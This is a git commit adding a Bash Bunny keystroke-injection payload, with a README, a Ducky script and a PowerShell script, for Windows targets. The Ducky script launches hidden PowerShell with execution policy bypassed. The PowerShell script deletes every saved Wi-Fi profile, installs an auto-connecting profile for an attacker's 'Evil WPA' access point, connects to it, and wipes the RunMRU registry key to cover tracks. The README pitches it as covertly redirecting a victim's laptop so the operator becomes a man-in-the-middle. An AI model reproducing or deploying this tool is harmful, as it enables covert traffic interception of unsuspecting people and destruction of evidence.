New Payload Pineapple-Connect-Windows (#439)

* New Payload

Added new PrintNightmare Payload (Quick and dirty)

* Fixed my potty mouth

I'm a child sometimes

* Renamed Payload

* PrintNightmare: Use SWITCH_POSITION in payload path

* Fixing a typo

* Added Delays

Added some delays due to the fact that it was inconsistently reliable, occasionally it'd half type out the command. The delays have resolved the consistency issue on my end. Feel free to tweak as required.

* Amending Version Number

I'm a fool

* Updated Readme with proper credit

* Housekeeping

Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use.

* Update README.md

* More improvement

Added exit to the juicybits rather than using alt  and /noprofile to the run as

* Update README.md

* Pineapple-Connect-Windows New Payload For Connecting Client To Pineapple AP / Any AP

Pineapple-Connect-Windows new Bashbunny payload for connecting target machine quickly and efficiently to your Pineapple AP or an AP of your choosing (and control!)

* Changed from RUN WIN to QUACK STRING

Changed from RUN WIN to QUACK STRING as I was having issues with the formatting, presume it needs wrapping in quotes or something but it just kept breaking. QUACK STRING works fine so meh

* Added command to cover traks at the end of the script

added a line of powershell to clean out the run registry key to hide any evidence of the script running

Co-authored-by: Marc <foxtrot@malloc.me>
Co-authored-by: Marc <foxtrot@realloc.me>

payloads/library/general/Pineapple-Connect-Windows/README.md

@@ -0,0 +1,23 @@
+Title:         Pineapple-Connect-Windows aka PanicAcid's Incog-neato WiFi Switcheroo'er
+
+Author:        PanicAcid
+
+Version:       1.0
+
+Deletes all saved wlans on a target machine and creates a new saved wlan with your desired SSID and PSK 
+
+Think getting a client to connect to your Mk7's Evil WPA Access Point.
+
+Picture the scene, you're on assignemnt, you manage to get access to your targets laptop by whatever means, pop this payload in and bam! In a matter of seconds they're unknowingly redirected to your Pineapple. 
+
+If you have your Pineapple on the same network they were on, there's little chance they'd even notice the change. (short of doing an ipconfig or checking the connected network, who does that unless something's not working right? Congrats, you're now the MITM. Have at it.
+
+Inspired by thatguy.exe on the Hak5 Discord
+
+# Purple.............Loading
+# Green .............Execute
+# Off................Finished
+
+Note that once again you'll want to set your DuckyLang to the correct language in the payload.txt and you'll need to edit the SSID and PSK variables in pconnect.ps1
+
+This is intended to be used with the Evil WPA Access Point feature in the current Beta / up-coming Stable WiFi Pineapple Mk VII firmware.

payloads/library/general/Pineapple-Connect-Windows/payload.txt

@@ -0,0 +1,45 @@
+#!/bin/bash
+# Title:         Pineapple-Connect-Windows aka PanicAcid's Incog-neato WiFi Switcheroo'er
+# Description:   Deletes all saved wlans on a target machine and creates a new saved wlan with your desired SSID and PSK 
+#                Think getting a client to connect to your Mk7's Evil WPA Access Point
+#				 Inspired by thatguy.exe on the Hak5 Discord
+# Author:        PanicAcid
+# Version:       1.0
+# Category:      General
+# Target:        Windows (Powershell)
+# Attackmodes:   HID, STORAGE
+#
+# Purple.............Loading
+# Green .............Execute
+# Off................Finished
+
+
+
+# OPTIONS - More options available in the Powershell payload
+OBFUSCATECMD="N" # Y=yes or N=no
+
+#-----------------------------------
+# Purple LED - initializing
+LED SETUP
+
+GET SWITCH_POSITION
+DUCKY_LANG gb
+# Attackmode HID / Storage
+ATTACKMODE HID STORAGE
+
+#-----------------------------------
+# Green LED - executing
+
+LED STAGE1
+
+#Let's Go!
+
+QUACK GUI r
+QUACK DELAY 300
+QUACK STRING Powershell -nop -ex Bypass -w Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\pconnect.ps1')"
+QUACK ENTER
+
+#-----------------------------------
+# Kill the lights - finished
+
+LED FINISH

payloads/library/general/Pineapple-Connect-Windows/pconnect.ps1

@@ -0,0 +1,52 @@
+
+$savedwlans = (netsh.exe wlan show profiles) -match "    All User Profile     : "
+$savedwlans = $savedwlans -replace "    All User Profile     : "
+
+$profilexml="$env:temp\Pineapple.xml"
+$SSID="PineAP_WPA"
+$PSK="pineapplesareyummy"
+
+ForEach ($savedwlan in $savedwlans){
+
+netsh wlan delete profile name=$savedwlan
+
+}
+
+
+$SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join''
+$xmlfile="<?xml version=""1.0""?>
+<WLANProfile xmlns=""http://www.microsoft.com/networking/WLAN/profile/v1"">
+    <name>$SSID</name>
+    <SSIDConfig>
+        <SSID>
+            <hex>$SSIDHEX</hex>
+            <name>$SSID</name>
+        </SSID>
+    </SSIDConfig>
+    <connectionType>ESS</connectionType>
+    <connectionMode>auto</connectionMode>
+    <MSM>
+        <security>
+            <authEncryption>
+                <authentication>WPA2PSK</authentication>
+                <encryption>AES</encryption>
+                <useOneX>false</useOneX>
+            </authEncryption>
+            <sharedKey>
+                <keyType>passPhrase</keyType>
+                <protected>false</protected>
+                <keyMaterial>$PSK</keyMaterial>
+            </sharedKey>
+        </security>
+    </MSM>
+</WLANProfile>
+"
+
+$XMLFILE > ($profilexml)
+netsh wlan add profile filename="$($profilexml)"
+netsh wlan show profiles $SSID key=clear
+netsh wlan connect name=$SSID
+
+rm $profilexml
+
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue